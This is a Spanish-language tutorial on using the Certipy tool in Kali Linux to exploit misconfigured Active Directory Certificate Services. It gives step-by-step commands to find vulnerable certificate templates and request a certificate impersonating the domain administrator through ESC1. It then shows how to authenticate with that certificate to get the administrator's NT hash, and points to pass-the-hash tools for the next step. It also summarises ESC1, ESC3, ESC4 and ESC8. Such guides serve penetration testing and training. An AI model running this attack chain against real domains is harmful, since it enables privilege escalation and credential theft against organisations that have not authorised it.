Hacking kali linux certipy-ad
Hacking kali linux certipy-ad
Certipy es una herramienta de código abierto extremadamente potente, escrita en Python, diseñada para enumerar y explotar fallas en los Servicios de Certificados de Active Directory (AD CS). Es la herramienta estándar en Kali Linux para realizar ataques de escalada de privilegios basados en certificados.
Aquí tienes una guía esencial sobre cómo usarla en español.
1. Instalación en Kali Linux
Aunque suele venir en los repositorios o puedes usarla vía pip, la forma más común de instalarla es:
sudo pip3 install certipy-ad
2. Metodología de Ataque (Pasos principales)
El flujo de trabajo con Certipy generalmente sigue tres fases: Enumeración, Explotación y Obtención del Hash.
A. Enumeración (Encontrar vulnerabilidades)
El primer paso es escanear el dominio para encontrar plantillas de certificados mal configuradas (como las famosas ESC1, ESC2, etc.).
certipy find -u 'usuario' -p 'contraseña' -dc-ip 10.10.10.10 -target-ip 10.10.10.10 -stdout
-stdout: Muestra los resultados en pantalla (también genera archivos
.zip,.jsony.txtcon los hallazgos).Busca: Certipy marcará como
"Vulnerable: True"aquellas plantillas que permitan escalada de privilegios.
B. Explotación (Solicitar el certificado)
Si encuentras una plantilla vulnerable (por ejemplo, ESC1, que permite especificar un nombre alternativo de sujeto o SAN), puedes solicitar un certificado pretendiendo ser el Administrador.
certipy req -u 'usuario' -p 'contraseña' -target 10.10.10.10 -ca 'Nombre-de-la-CA' -template 'NombrePlantillaVulnerable' -upn administrator@dominio.local
Esto te generará un archivo
.pfx(el certificado privado).
C. Autenticación (Obtener el Hash NT)
Una vez que tienes el archivo .pfx, puedes usarlo para autenticarte contra el KDC (Key Distribution Center) y obtener el hash del usuario objetivo.
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
Resultado: Obtendrás el Hash NT del Administrador, el cual puedes usar para un ataque de Pass-the-Hash con herramientas como
evil-winrmoimpacket-psexec.
3. Vulnerabilidades comunes que detecta
| Vulnerabilidad | Descripción Corta |
| ESC1 | El usuario puede solicitar un certificado para cualquier otro usuario (incluyendo Admins). |
| ESC3 | Uso de certificados de "Agente de Inscripción" para solicitar certificados en nombre de otros. |
| ESC4 | Permisos de escritura sobre la propia plantilla, permitiendo que el atacante la haga vulnerable a propósito. |
| ESC8 | Relé de NTLM hacia las páginas HTTP de inscripción de certificados (AD CS Web Enrollment). |
Consejos Útiles
Sincronización de hora: Kerberos es muy estricto con el tiempo. Asegúrate de que tu reloj en Kali esté sincronizado con el DC:
sudo ntpdate 10.10.10.10.DNS: A veces es necesario añadir el nombre del dominio y de la CA a tu archivo
/etc/hosts.